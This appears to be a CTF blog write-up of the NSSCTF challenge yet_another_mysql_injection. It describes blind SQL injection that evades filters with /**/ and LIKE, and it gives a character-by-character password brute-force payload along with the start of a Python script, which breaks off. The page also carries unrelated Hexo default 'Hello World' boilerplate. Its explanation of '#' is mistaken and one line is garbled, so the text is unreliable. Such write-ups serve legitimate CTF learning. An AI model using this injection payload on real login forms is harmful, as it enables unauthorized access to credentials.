NSSCTF [第五空间2021]yet_another_mysql_injection, [HNCTF 2022 WEEK2]ez_ssrf
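NSSCTF [NSSROUND 8] yet_another_mysql_injection

There are two solutions: brute-forcing the password and quine injection. This post covers only the first; scripts for the second are widely available online.

Background:
% only takes effect in SQL LIKE statements
_ matches exactly one character
in SQL, matches the preceding character x times

Brute-forcing the password

Testing shows that spaces and the equals sign are filtered, so /**/ and like are used to bypass the filter, and the password is brute-forced one character at a time. The query is built as:

1'or/**/password/**/like/**/'{flag+i}%'#

The # serves to match the part of the password that has not been brute-forced yet; * would match only a single letter, so # is used to match all the remaining characters.

Script:

import requests
import time
str = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+-=[]{...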
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.

Quick Start

Create a new post
$ hexo new "My New Post"
More info: Writing

Run server
$ hexo server
More info: Server

Generate static files
$ hexo generate
More info: Generating

Deploy to remote sites
$ hexo deploy
More info: Deployment
